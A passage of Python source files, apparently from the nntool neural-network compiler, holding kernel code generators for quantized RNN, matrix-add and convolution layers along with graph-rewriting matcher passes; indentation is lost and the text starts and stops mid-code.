self.n_inputs = rnn_params.n_inputs
self.n_input_cells = rnn_params.n_input_cells
self.n_output_cells = rnn_params.n_output_cells
self.revert = rnn_params.revert
if not rnn_params.hard_act:
gen_ctrl.rnn_use_hardact = 0
if not rnn_params.rnn_same_inout_scale:
gen_ctrl.rnn_same_inout_scale = 0
self.cname = cname
self.node_name = node_name
self.at_ver = at_ver
def code(self, code_block=None):
if code_block is None:
code_block = CodeBlock()
code_block.comment("generator for {}", self.node_name)
if not self.gen_ctrl.is_unmodified:
self.gen_ctrl.gen_ctrl_decl(code_block)
gen_ctrl = self.gen_ctrl.ctrl_name
else:
gen_ctrl = "0"
gen_rnn_sq8(code_block, self.kname, self.cname, gen_ctrl, self.n_cells,
self.n_input_cells, self.n_output_cells,
self.n_states,
self.n_inputs,
self.revert and "1" or "0")
return code_block
```
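For orientation, a minimal sketch of the call that `gen_rnn_sq8` above emits; the dimensions are invented and the import path is inferred from the file heading, so treat both as assumptions.
```python
# Sketch only: invented dimensions, import path assumed from the file heading above.
from generation.code_block import CodeBlock
from generation.generators.kernels.mult8.rnn_kernels_generator import gen_rnn_sq8

code = CodeBlock()
# 2 cells, every cell both an input and an output cell, 16-wide state, 10-wide input
gen_rnn_sq8(code, "RNN_Stack_SQ8", "net_rnn_0", "0", 2, 2, 2, 16, 10, "0")
# the code block now contains:
#   RNN_Stack_SQ8("net_rnn_0", 0, 4, 1, 2, 2, 2, 16, 10, 0, 0);
```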
#### File: kernels/pow2/matadd_kernels_generator.py
```python
from generation.templet import stringfunction
from generation.at_generators.utils import at_bits
import logging
from generation.at_generators import (NO_ACTIVATION, gen_active_at_params,
gen_at_matrixadd, gen_at_matrixadddyn,
gen_matrixadd_at_params,
gen_matrixadddyn_at_params)
from generation.at_types.gen_ctrl import GenCtrl
from generation.code_block import CodeBlock
from generation.generator_decorators import generation_function, QREC_POW2
from graph.types import MatrixAddParameters
from ..autotiler_kernel import AutotilerKernel, NewAutoTilerKernel
LOG = logging.getLogger("nntool." + __name__)
@generation_function("kernels", (MatrixAddParameters, ), qrec_types=(QREC_POW2, ))
def matadd_kernels_generator(gen, node, qrec, in_eparams, out_eparams, cname):
del in_eparams, out_eparams
if qrec.in_qs[0].q == qrec.in_qs[1].q and qrec.in_qs[0].q == qrec.out_qs[0].q:
gen.kernels.append(MatrixAddKernel(cname, node, qrec, None, None,
gen_ctrl=node.get_gen_ctrl(),
at_ver=gen.opts['at_ver']))
else:
gen.kernels.append(MatrixAddDynKernel(cname, node, qrec, None, None,
gen_ctrl=node.get_gen_ctrl(),
at_ver=gen.opts['at_ver']))
return True
class MatrixAddKernel(AutotilerKernel):
def __init__(self, cname, matrixadd_params, matrixadd_q, act_params, act_q, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
self.gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
self.gen_ctrl = gen_ctrl
at_matrixadd_params = gen_matrixadd_at_params(matrixadd_params)
in_dim = matrixadd_params.in_dims[0]
out_dim = matrixadd_params.out_dims[0]
in_q1 = matrixadd_q.in_qs[0]
in_q2 = matrixadd_q.in_qs[1]
out_q = matrixadd_q.out_qs[0]
if act_params is not None:
at_act_params = gen_active_at_params(act_params)
out_q = act_q.out_qs[0]
if at_ver < 3:
if act_params.activation == "relu6" and out_q.q != 0:
self.gen_ctrl.ReluN = 6 << out_q.q
self.gen_ctrl.ReluNNoNorm = 1
else:
if act_params.activation == "relun":
self.gen_ctrl.ReluN = act_params.activation_params
else:
at_act_params = NO_ACTIVATION
self.at_matrixadd_params = at_matrixadd_params
self.in_dim = in_dim
self.out_dim = out_dim
self.in_q1 = in_q1
self.in_q2 = in_q2
self.out_q = out_q
self.at_act_params = at_act_params
self.cname = cname
self.node_name = matrixadd_params.name
self.at_ver = at_ver
def code(self, code_block=None):
if code_block is None:
code_block = CodeBlock()
code_block.comment("generator for {}", self.node_name)
if not self.gen_ctrl.is_unmodified:
self.gen_ctrl.gen_ctrl_decl(code_block)
gen_at_matrixadd(code_block, self.cname, self.in_q1, self.in_q2, self.out_q,
self.in_dim, self.out_dim, self.at_matrixadd_params,
at_ver=self.at_ver, gen_ctrl=self.gen_ctrl)
return code_block
def insert_axis(shape, make_len):
if len(shape) > make_len:
raise ValueError(f'shape {shape} exceeds maximum length {make_len}')
return tuple(([1] * (make_len - len(shape))) + shape)
class MatrixAddDynKernel(NewAutoTilerKernel):
CALL_TEMPLATE = '''
// generator for {node_name}
CNN_MatAddDynAdjust("{cname}", {gen_ctrl}, {at_bits(in_q1)}, {at_bits(in_q2)}, {at_bits(out_q)},
{in_q1.q}, {in_q2.q}, {out_q.q}, 1, 1, 1,
{in_shape[0]}, {out_shape[0]},
{in_shape[1]}, {in_shape[2]}, KOP_MATADD_DYNADJUST);
'''
def __init__(self, cname, params, matrixadd_q, act_params, act_q, gen_ctrl=None, at_ver=3):
if gen_ctrl is None:
gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
in_shape1 = insert_axis(params.in_dims[0].shape, 3)
in_shape2 = insert_axis(params.in_dims[1].shape, 3)
out_shape = insert_axis(params.out_dims[0].shape, 3)
if in_shape1 != in_shape2 or in_shape1 != out_shape:
raise ValueError(f'CNN_MatAddDynAdjust has been selected for {params.name} but '
f'has shape {in_shape1} {in_shape2} -> {out_shape}')
in_q1 = matrixadd_q.in_qs[0]
in_q2 = matrixadd_q.in_qs[1]
out_q = matrixadd_q.out_qs[0]
if act_params is not None:
raise ValueError(f'CNN_MatAddDynAdjust has been selected for {params.name} but '
f'it has a fused activation which is not compatible')
attrs = {
'in_q1': in_q1,
'in_q2': in_q2,
'out_q': out_q,
'in_shape': in_shape1,
'out_shape': out_shape
}
extra_attrs = {
'cname': cname,
'node_name': params.name
}
super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl)
```
#### File: new_generators/float/padded_matadd_float.py
```python
import logging
from generation.at_types.at_params import NO_ACTIVATION, gen_activation_op
from generation.at_types.gen_ctrl import GenCtrl
from generation.bindings import (CommentBindingList, GNodeArgEdge,
NodeBindingList)
from generation.new_generators.mult8.matadd_mult8 import make_three_dims
from generation.generators.kernels.autotiler_kernel import NewAutoTilerKernel
from generation.new_generators.generator_base import (GeneratorBase, ktype,
paramstype)
from graph.types import MatrixAddParameters, PaddedAddFusionParameters
from utils.node_id import NodeId
LOG = logging.getLogger("nntool." + __name__)
@paramstype(PaddedAddFusionParameters)
@ktype("float")
class PaddedMatAddFloatGenerator(GeneratorBase):
@classmethod
def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool:
return True
@classmethod
def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
step_idx = node.step_idx
cnodes = node.contained_nodes()
quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes]
add_node = [node for node in cnodes if isinstance(
node, MatrixAddParameters)]
if add_node:
quants = [gen.G.quantization[NodeId(
node, fnode)] for fnode in cnodes]
gen.bindings.append(
CommentBindingList("Node {} in1q {} in2q {} outq {}", cname,
quants[1].in_qs[0], quants[1].in_qs[1], quants[-1].out_qs[0])
)
gen.bindings.append(
NodeBindingList(cname,
GNodeArgEdge(in_eparams[0]),
GNodeArgEdge(in_eparams[1]),
GNodeArgEdge(out_eparams[0], "GNA_OUT")
))
return True
@classmethod
def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
cnodes = node.contained_nodes()
if len(cnodes) > 2:
act_node = cnodes[2]
else:
act_node = None
pad_node = cnodes[0]
gen.kernels.append(PaddedMatAddKernelFloat(node.name, cname, node, pad_node, act_node, at_ver=gen.opts['at_ver'], force_relu=gen.force_relu))
return True
class PaddedMatAddKernelFloat(NewAutoTilerKernel):
CALL_TEMPLATE = """
// generator for {node_name}
CNN_MatAddPaddedAct_fp16("{cname}", {gen_ctrl}, {feat}, {width}, {height}, {padtop}, {padbot}, {padded_idx}, KOP_MATADD, {act_oper});
"""
def __init__(self, node_name, cname, matrixadd_params, pad_params, act_params, at_ver=3, gen_ctrl=None, force_relu=True):
if gen_ctrl is None:
gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
if act_params is not None:
at_act_params = gen_activation_op(act_params.activation, force_relu=force_relu)
else:
at_act_params = NO_ACTIVATION
padtop = pad_params.padding[0][0]
padbot = pad_params.padding[0][1]
padded_idx = 0 if matrixadd_params.in_dims[0].size() > matrixadd_params.in_dims[1].size() else 1
dimensions0 = make_three_dims(matrixadd_params.in_dims[0])
dimensions1 = make_three_dims(matrixadd_params.in_dims[1])
attrs = {
'feat': max(dimensions0[0], dimensions1[0]),
'width': dimensions0[1],
'height': dimensions0[2],
'padded_idx': padded_idx,
'padtop': padtop,
'padbot': padbot,
'act_oper': at_act_params
}
extra_attrs = {
'cname': cname,
'node_name': node_name
}
super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl)
```
#### File: new_generators/mult8/conv_pool_mult8.py
```python
from graph.dim import PadDim
from graph.types.pooling import PoolingParameters
from quantization.multiplicative.scaling_qtypes import MultMulBiasScaleQType
from generation.new_generators.helpers.act_infos import gen_act_infos
from generation.helpers.gen_scales import gen_scales
from generation.at_types.at_params import NO_POOL, gen_activation_op, gen_conv_at_params, gen_pool_at_params
import logging
from utils.node_id import NodeId
import numpy as np
from generation.at_types.constant_info import ConstantInfo
from generation.at_types.gen_ctrl import GenCtrl
from generation.at_types.tc_arg_info import GlobalArgInfo
from generation.bindings import (CommentBindingList, GNodeArgEdge,
GNodeArgNode, NodeBindingList)
from generation.generators.globals.global_names import INFOS, MULSCALE, MULSHIFT
from generation.generators.kernels.autotiler_kernel import NewAutoTilerKernel
from generation.helpers.gen_constant import gen_constant
from generation.new_generators.generator_base import (GeneratorBase,
paramstype, ktype)
from graph.types import Conv2DParameters, ConvFusionParameters
from quantization.qtype import QType
LOG = logging.getLogger("nntool." + __name__)
def verify_scalar(arr):
return [item.item() if isinstance(item, np.ndarray) else item for item in arr]
@paramstype(Conv2DParameters, ConvFusionParameters)
@ktype('scaled')
class ConvActGenerator(GeneratorBase):
@classmethod
def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool:
if isinstance(pnode, Conv2DParameters):
gen_scales(gen, pnode, pnode, qrec)
infos, infos_comment = np.array([0, 0, 0, 0, 0]), "no activation"
filt_q = qrec
fnode = pnode
elif isinstance(pnode, ConvFusionParameters) and isinstance(fnode, Conv2DParameters):
cnodes = pnode.contained_nodes()
quants = [gen.G.quantization[NodeId(pnode, fnode)] for fnode in cnodes]
filt_q = quants[0]
gen_scales(gen, pnode, cnodes[0], quants[0])
if pnode.fusion_type in ("conv_active_pool", "conv_active"):
infos, infos_comment = gen_act_infos(cnodes[1], quants[1])
elif pnode.fusion_type == "conv_pool_active":
infos, infos_comment = gen_act_infos(cnodes[2], quants[2])
elif pnode.fusion_type == "conv_pool":
infos, infos_comment = np.array([0, 0, 0, 0, 0]), "no activation"
else:
return False
infos = np.append(infos, [0, 0, 0, 0])
comment = str.format("BiasQ: {}", 0) + infos_comment
infos[5] = 0 # BiasQ
if filt_q.cache.get('ne16'):
conv_mul_bias = filt_q.cache.get('mul_biases_q')
prenorm = conv_mul_bias.pre_normalization if isinstance(conv_mul_bias, MultMulBiasScaleQType) else 0
pad_value = np.array(filt_q.in_qs[0].zero_point).astype(np.int16)
pad_value1 = np.bitwise_and(pad_value, 0xFF)
pad_value2 = np.bitwise_and(pad_value, 0xFF00) >> 8
w_offset = -np.array(filt_q.in_qs[1].zero_point).astype(np.int32)
w_offset1 = np.bitwise_and(w_offset, 0xFF)
w_offset2 = np.bitwise_and(w_offset, 0xFF00) >> 8
w_offset3 = np.bitwise_and(w_offset, 0xFF0000) >> 16
w_offset4 = np.bitwise_and(w_offset, 0xFF000000) >> 24
infos = np.append(
infos, verify_scalar([prenorm if prenorm else 0, pad_value1, pad_value2, w_offset1, w_offset2, w_offset3, w_offset4]))
cname, file_name = gen_constant(gen, pnode, fnode, INFOS)
const_info = ConstantInfo(file_name, QType.Pow2(bits=8, q=0, signed=True), contents=infos)
gen.globals.append(GlobalArgInfo("int8", cname,
gen.opts['default_global_home_location'],
gen.opts['default_global_exec_location'],
const_info=const_info,
comment=comment))
return True
@classmethod
def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
step_idx = node.step_idx
if isinstance(node, Conv2DParameters):
set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname, node, qrec)
elif isinstance(node, ConvFusionParameters):
cnodes = node.contained_nodes()
quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes]
if node.fusion_type in ("conv_active_pool", "conv_active", "conv_pool"):
set_conv_bindings(gen, step_idx, in_eparams, out_eparams,
cname, cnodes[0], quants[0], out_q=quants[1])
elif node.fusion_type == "conv_pool_active":
set_conv_bindings(gen, step_idx, in_eparams, out_eparams,
cname, cnodes[0], quants[0], out_q=quants[2])
else:
return False
else:
return False
return True
@classmethod
def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
if isinstance(node, Conv2DParameters):
conv_kernel = ConvPoolReluKernelNE16 if qrec.cache.get("ne16") else ConvPoolReluKernelSQ8
gen.kernels.append(conv_kernel(node.name, cname, node, qrec, None, None, None, None,
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif isinstance(node, ConvFusionParameters):
cnodes = node.contained_nodes()
quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes]
conv_kernel = ConvPoolReluKernelNE16 if quants[0].cache.get("ne16") else ConvPoolReluKernelSQ8
if node.fusion_type == "conv_active_pool":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], cnodes[2], quants[2], cnodes[1], quants[1],
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif node.fusion_type == "conv_pool_active":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], cnodes[1], quants[1], cnodes[2], quants[2],
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif node.fusion_type == "conv_active":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], None, None, cnodes[1], quants[1],
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
elif node.fusion_type == "conv_pool":
gen.kernels.append(conv_kernel(node.name, cname, cnodes[0], quants[0], cnodes[1], quants[1], None, None,
force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl()))
else:
return False
return True
def set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname,
conv_params, conv_q, out_q=None):
del step_idx
if out_q is None:
out_q = conv_q
gen.bindings.append(
CommentBindingList("Node {} inq {} weightsq {} outq {} biasesq {}", cname,
conv_q.in_qs[0], conv_q.in_qs[1], out_q.out_qs[0], conv_q.in_qs[2])
)
gen.bindings.append(
NodeBindingList(cname, GNodeArgEdge(in_eparams[0]),
GNodeArgEdge(in_eparams[1]),
GNodeArgEdge(in_eparams[2]),
GNodeArgEdge(out_eparams[0], "GNA_OUT"),
GNodeArgNode(conv_params, MULSCALE),
GNodeArgNode(conv_params, MULSHIFT),
GNodeArgNode(conv_params, INFOS)
))
class ConvPoolReluKernel(NewAutoTilerKernel):
def __init__(self, node_name, cname, conv_params, conv_q, pool_params, pool_q, act_params, act_q, force_relu, gen_ctrl=None):
if gen_ctrl is None:
self.gen_ctrl = gen_ctrl = GenCtrl(None, cname=cname)
else:
gen_ctrl.cname = cname
self.gen_ctrl = gen_ctrl
is_ne16 = conv_q.cache.get('ne16')
hwc = False
if not is_ne16 and conv_params.ker_in_order and conv_params.ker_in_order[0] == ["h", "w", "c"]:
hwc = True
gen_ctrl.hwc = 1
if not is_ne16 and not hwc and conv_params.filter.h == 1 and conv_params.filter.w == 1 and gen_ctrl.enableim2col is None:
gen_ctrl.enableim2col = 1
in_q = filter_q = out_q = bias_q = None
in_dim = out_dim = None
pad_compatibilities = []
at_conv_params = gen_conv_at_params(
conv_params, pad_compatibilities)
in_dim = conv_params.in_dims[0]
out_dim = conv_params.out_dims[0]
filter_q = conv_q.in_qs[1]
in_q = conv_q.in_qs[0]
out_q = conv_q.out_qs[0]
bias_q = conv_q.in_qs[2]
pad_val = in_q.zero_point[0]
if pool_params is not None:
at_pool_params = gen_pool_at_params(
pool_params, pad_compatibilities)
out_dim = pool_params.out_dims[0]
out_q = pool_q.out_qs[0]
else:
at_pool_params = NO_POOL
if act_params is not None:
act_op = gen_activation_op(
act_params.activation, force_relu=force_relu, asymmetric=act_q.in_qs[0].zero_point != 0)
if out_dim is None:
out_dim = act_params.out_dims[0].expand_to_chw()
out_q = act_q.out_qs[0]
else:
act_op = "KOP_NONE"
if pad_compatibilities:
reduction = PadDim.pad_compatibility_reduce(*pad_compatibilities,
"convolution padding is not compatible with pool padding")
if not reduction[2]: # default is balanced pad left
at_pad_ctrl = next(i for i, v in enumerate(reduction) if v)
LOG.debug("%s: generating pad control block", node_name)
self.gen_ctrl.PadType = at_pad_ctrl
attrs = {
'in_size': in_q.dtype_bits//8 if in_q.signed else -in_q.dtype_bits//8,
'out_size': out_q.dtype_bits//8 if out_q.signed else -out_q.dtype_bits//8,
'bias_size': bias_q.dtype_bits//8,
'filter_bits': filter_q.bits,
'in_feat': in_dim.c,
'out_feat': out_dim.c,
'in_width': in_dim.w,
'in_height': in_dim.h,
'kop_conv': at_conv_params.ConvOper,
'fcx': at_conv_params.Fcx,
'fcy': at_conv_params.Fcy,
'dcx': at_conv_params.Dcx,
'dcy': at_conv_params.Dcy,
'scx': at_conv_params.Scx,
'scy': at_conv_params.Scy,
'conv_pad': at_conv_params.ConvPad,
'pad_value': pad_val,
'kop_pool': at_pool_params.PoolOper,
'fpx': at_pool_params.Fpx,
'fpy': at_pool_params.Fpy,
'dpx': at_pool_params.Dpx,
'dpy': at_pool_params.Dpy,
'spx': at_pool_params.Spx,
'spy': at_pool_params.Spy,
'pool_pad': at_pool_params.PoolPad,
'kop_act': act_op
}
extra_attrs = {
'cname': cname,
'node_name': node_name
}
super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl)
class ConvPoolReluKernelNE16(ConvPoolReluKernel):
CALL_TEMPLATE = """// generator for {node_name}
CNN_ConvolutionNE16("{cname}", {gen_ctrl},
{in_size}, {out_size}, {bias_size}, 1, {filter_bits},
{in_feat}, {out_feat}, {in_width}, {in_height},
{kop_conv}, {fcx}, {fcy}, {dcx}, {dcy}, {scx}, {scy}, {conv_pad}, {pad_value},
{kop_pool}, {fpx}, {fpy}, {dpx}, {dpy}, {spx}, {spy}, {pool_pad},
{kop_act});
"""
class ConvPoolReluKernelSQ8(ConvPoolReluKernel):
CALL_TEMPLATE = """// generator for {node_name}
CNN_ConvolutionPoolAct_SQ8("{cname}", {gen_ctrl}, {bias_size}, 1,
{in_feat}, {out_feat}, {in_width}, {in_height},
{kop_conv}, {fcx}, {fcy}, {dcx}, {dcy}, {scx}, {scy}, {conv_pad},
{kop_pool}, {fpx}, {fpy}, {dpx}, {dpy}, {spx}, {spy}, {pool_pad},
{kop_act});
"""
```
#### File: manipulations/adjusts/pool.py
```python
import logging
from graph.types import (ActivationFusion, AveragePoolParameters,
MaxPoolParameters, PoolingParameters)
from ..adjust_base import AdjusterBase, handles
LOG = logging.getLogger("nntool." + __name__)
@handles(MaxPoolParameters, AveragePoolParameters)
class PoolAdjuster(AdjusterBase):
def adjust(self, G, node):
modified = False
# check that the transposed input 0 matches autotiler order
names = node.in_dims[0].order
if names != node.ker_in_order[0]:
self.adjust_in_out_order(G, node, names, node.ker_in_order[0])
modified = True
return modified
@handles(ActivationFusion)
class PoolFusionAdjuster(AdjusterBase):
def adjust(self, G, node):
modified = False
fusion_node = node
pool_node = next(iter([node for node in fusion_node.contained_nodes() if isinstance(node, PoolingParameters)]), None)
if pool_node is None:
return modified
# check that the transposed input 0 matches autotiler order
names = pool_node.in_dims[0].order
if names != pool_node.ker_in_order[0]:
self.adjust_in_out_order(G, pool_node, names, pool_node.ker_in_order[0], fusion=fusion_node)
modified = True
return modified
```
#### File: matches/matchers/combine_concats.py
```python
import logging
from graph.dim import Dim
from graph.types import (ConcatParameters, CopyParameters, InputParameters,
NNEdge, ReshapeParameters, Parameters)
from utils.graph import GraphView, Node
from utils.node_id import NodeId
from ..matcher import (Matcher, description, groups, match_name,
modifies_dimensions, needs_valid_dimension, run_before)
LOG = logging.getLogger("nntool." + __name__)
class DummyInput(Parameters):
def __init__(self, name: str, edge):
super().__init__(name)
self.edge = edge
def traverse_to_concat(G, edge, subgraph, edge_path=None):
if edge_path is None:
edge_path = []
node = edge.from_node
if isinstance(node, ConcatParameters):
if node.axis != 0 or len(G.out_edges(node)) > 1:
return []
find_concats_up(G, node, subgraph)
return edge_path + [edge]
elif isinstance(node, (CopyParameters, ReshapeParameters)):
if len(G.out_edges(node)) > 1:
return []
in_edge = G.in_edges(node)[0]
return traverse_to_concat(G, in_edge, subgraph, edge_path=edge_path + [edge])
else:
return []
def find_concats_up(G, concat, subgraph: GraphView = None):
# Produces a subgraph of concats operating on axis 0 separated by copys or reshapes.
# the output node will be the final concat. the input nodes will be all the inputs
# to a condensed concat that can replace this subgraph.
if subgraph is None:
subgraph = GraphView()
edge_path = []
for edge in G.indexed_in_edges(concat.name):
edge_path = traverse_to_concat(G, edge, subgraph)
if edge_path:
for inter_edge in edge_path:
subgraph.add_edge(inter_edge)
else:
subgraph.add_edge(
NNEdge(
from_node=DummyInput(f"{edge.from_node.name}_{edge.from_idx}", edge),
to_node=edge.to_node,
to_idx=edge.to_idx
)
)
return subgraph
# def find_concats_up(G, node, subgraph: GraphView = None, edge_path=None):
# # Produces a subgraph of concats operating on axis 0 separated by copys or reshapes.
# # the output node will be the final concat. the input nodes will be all the inputs
# # to a condensed concat that can replace this subgraph.
# if subgraph is None:
# subgraph = GraphView()
# edge_path = []
# for edge in G.indexed_in_edges(node.name):
# if isinstance(edge.from_node, ConcatParameters):
# if len(G.out_edges(edge.from_node.name)) > 1 or edge.from_node.axis != 0:
# continue
# edge_path.append(edge)
# for traversed_edge in edge_path:
# subgraph.add_edge(traversed_edge.clone())
# find_concats_up(G, edge.from_node, subgraph=subgraph, edge_path=[])
# elif isinstance(edge.from_node, (CopyParameters, ReshapeParameters)):
# if len(G.out_edges(edge.from_node.name)) > 1:
# continue
# find_concats_up(G, edge.from_node, subgraph=subgraph,
# edge_path=edge_path + [edge])
# return subgraph
def remove_internal_graph(G, subgraph):
in_nodes = subgraph.inputs()
concat_node = subgraph.outputs()[0]
for in_node in in_nodes:
if G.edge_in_graph(in_node.edge):
G.remove_edge(in_node.edge)
nodes = {in_node.edge.to_node}
while nodes:
node = nodes.pop()
if node == concat_node:
continue
nodes |= set(edge.to_node for edge in subgraph.out_edges(node))
if node in G:
G.remove(node)
nid = NodeId(node)
if G.quantization and nid in G.quantization:
del G.quantization[nid]
@ match_name("combine_concats")
@ description("Combine concats on 0 axis together")
@ run_before('insert_copies')
@ groups('*')
@ needs_valid_dimension(True)
@ modifies_dimensions(True)
class CombineConcats(Matcher):
def _match(self, G: GraphView, set_identity: bool = True, **kwargs):
modified_graph = False
concats = set(G.nodes(node_classes=ConcatParameters))
while concats:
concat = concats.pop()
if concat.axis != 0:
continue
subgraph = find_concats_up(G, concat)
found = set(subgraph.nodes(node_classes=ConcatParameters))
if len(found) <= 1:
continue
LOG.info(
f"Combining concats {','.join([node.name for node in found])}")
modified_graph = True
concats -= found
in_edges = [inp.edge for inp in subgraph.inputs()]
in_dims = [
edge.from_node.out_dims[edge.from_idx] for edge in in_edges
]
nodes_to_remove = [node for node in subgraph.nodes() if node != concat and not isinstance(node, DummyInput)]
for edge in in_edges:
G.remove_edge(edge)
for node in nodes_to_remove:
if node.name in G:
G.remove(node)
nid = NodeId(node)
if G.quantization and nid in G.quantization:
del G.quantization[nid]
# remove_internal_graph(G, subgraph)
out_dim = concat.out_dims[0]
in_qs = []
for idx, edge in enumerate(in_edges):
from_node = edge.from_node
from_idx = edge.from_idx
if len(in_dims[idx]) > 1:
reshape = ReshapeParameters(
G.unique_name(f'{concat.name}_flat{idx}'),
old_shape=in_dims[idx],
shape=Dim.unnamed([in_dims[idx].size()]))
G.add_edge(
NNEdge(
from_node=from_node, from_idx=from_idx,
to_node=reshape))
from_node = reshape
from_idx = 0
G.add_edge(
NNEdge(
from_node=from_node, from_idx=from_idx,
to_node=concat, to_idx=idx))
if in_qs is not None and G.quantization:
nid = NodeId(edge.from_node)
if nid in G.quantization:
qrec = G.quantization[nid]
in_qs.append(qrec.out_qs[edge.from_idx])
else:
in_qs = None
else:
in_qs = None
if in_qs is not None and G.quantization:
nid = NodeId(concat)
if nid in G.quantization:
G.quantization[nid].in_qs = in_qs
reshape = ReshapeParameters(
G.unique_name(f'{concat.name}_expand'),
old_shape=Dim.unnamed([out_dim.size()]),
shape=out_dim)
G.insert_node_after(concat, reshape, edge_class=NNEdge)
if set_identity:
self.set_identity(G)
return modified_graph
```
#### File: matches/matchers/duplicate_constants.py
```python
import logging
from graph.dim import Dim
from graph.types import ConstantInputParameters, NNEdge
from utils.graph import GraphView
from ..matcher import Matcher, match_name, description, run_before, groups
LOG = logging.getLogger("nntool." + __name__)
@match_name("match_duplicate_constants")
@description("""Find constants that are linked to more than one node and duplicate them""")
@run_before('*')
@groups('symmetric', 'scaled')
class MatchDuplicateConstants(Matcher):
def _match(self, G: GraphView, set_identity: bool = True, **kwargs):
has_modified = False
for node in G.nodes(node_classes=ConstantInputParameters):
out_edges = G.out_edges(node.name)
if len(out_edges) <= 1:
continue
has_modified = True
LOG.info('node %s has more than one out edge and will be duplicated', node.name)
idx = 1
for out_edge in out_edges[1::]:
new_constant = ConstantInputParameters(
f'{node.name}_{idx}', dims=Dim.unnamed(node.dims.shape),
value=node.value.copy())
G.remove_edge(out_edge)
G.add_edge(NNEdge(from_node=new_constant, to_node=out_edge.to_node, to_idx=out_edge.to_idx))
idx += 1
if set_identity:
self.set_identity(G)
return has_modified
```
#### File: matches/matchers/remove_slice.py
```python
import logging
from graph.types import NNEdge
from graph.types.others import ReshapeParameters, StridedSliceParameters
from utils.graph import GraphView
from utils.node_id import NodeId
from ..matcher import Matcher, match_name, description, run_before, groups
LOG = logging.getLogger("nntool." + __name__)
@match_name("remove_slice")
@description("Removes slices that are doing nothing and may insert a reshape if necessary.")
@run_before('*')
@groups('symmetric', 'scaled')
class RemoveSlice(Matcher):
def _match(self, G: GraphView, set_identity: bool = True, **kwargs) -> bool:
has_modified_graph = False
for node in [node for node in G.nodes(node_classes=StridedSliceParameters)]:
if node.slice_shape != tuple(node.in_dims[0].shape):
continue
has_modified_graph = True
nid = NodeId(node)
if node.slice_shape == node.out_shape:
LOG.info(f'removing strided slice {node.name} that does nothing')
G.remove_and_reconnect(node, edge_class=NNEdge)
if G.quantization and nid in G.quantization:
del G.quantization[nid]
else:
reshape = ReshapeParameters(G.unique_name(f'{node.name}_reshape'), old_shape=node.slice_shape, shape=node.out_shape)
LOG.info(f'replacing strided slice {node.name} with reshape {reshape.name}')
G.replace_node(node, reshape)
if G.quantization and nid in G.quantization:
G.quantization[NodeId(reshape)] = G.quantization[nid]
del G.quantization[nid]
if set_identity:
self.set_identity(G)
return has_modified_graph
```
#### File: graph/matches/matches.py
```python
import logging
from graph.matches.matcher import Matcher, MatchGroup
from utils.subclasses import get_all_subclasses
from .matchers import *
LOG = logging.getLogger("nntool." + __name__)
def general_validation(match: Matcher):
if match.DESCRIPTION is None:
LOG.warning('matcher %s has no description', match.NAME)
if match.NAME is None:
raise ValueError(f'match {match.NAME} has no name')
if '*' in match.RUN_BEFORE and '*' in match.RUN_AFTER:
raise ValueError(
f'match {match.NAME} has wildcard in run_before and run_after')
return match
ALL_MATCHERS = [general_validation(match_class) for match_class in get_all_subclasses(Matcher)
if match_class.NAME is not None]
def select_matchers(group=None):
return [match_class for match_class in ALL_MATCHERS
if (group is None or '*' in match_class.GROUPS or group in match_class.GROUPS)]
def order_matchers(matchers):
first_matchers = [match for match in matchers if '*' in match.RUN_BEFORE]
last_matchers = [match for match in matchers if '*' in match.RUN_AFTER]
rest = [match for match in matchers if match not in first_matchers +
last_matchers]
rest_sorted = []
while rest:
matcher = rest.pop(0)
pos = 0
for omatch in rest_sorted:
if matcher.NAME in omatch.RUN_AFTER:
break
if omatch.NAME in matcher.RUN_BEFORE:
break
pos += 1
rest_sorted.insert(pos, matcher)
return first_matchers + rest_sorted + last_matchers
def select_sorted_matchers(group=None):
return order_matchers(select_matchers(group=group))
def select_sorted_matcher_instances(group=None):
return [matcher() for matcher in select_sorted_matchers(group=group)]
def get_fusions():
return sorted(
[(match_class.NAME, match_class.DESCRIPTION)
for match_class in ALL_MATCHERS],
key=lambda x: x[0])
def get_pow2_match_group():
return MatchGroup(
*select_sorted_matcher_instances(group='symmetric'),
identity="pow2_match_group"
)
def get_scale8_match_group():
return MatchGroup(
*select_sorted_matcher_instances(group='scaled'),
identity="std_match_group"
)
def get_fusion(name):
if name in ["pow2_match_group"]:
return get_pow2_match_group()
if name in ["std_match_group", "scale8_match_group"]:
return get_scale8_match_group()
match_class = next((match_class for match_class in select_matchers()
if match_class.NAME == name), None)
if match_class is not None:
return match_class()
return None
```
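A small sketch of how `order_matchers` above sequences passes: a `'*'` in `RUN_BEFORE` pins a matcher to the front, a `'*'` in `RUN_AFTER` pins it to the back, and pairwise hints order the rest. The matcher objects below are invented stand-ins, not real nntool passes.
```python
# Stand-in objects carrying only the attributes order_matchers() reads.
from types import SimpleNamespace
from graph.matches.matches import order_matchers

first = SimpleNamespace(NAME='remove_noops', RUN_BEFORE=['*'], RUN_AFTER=[])
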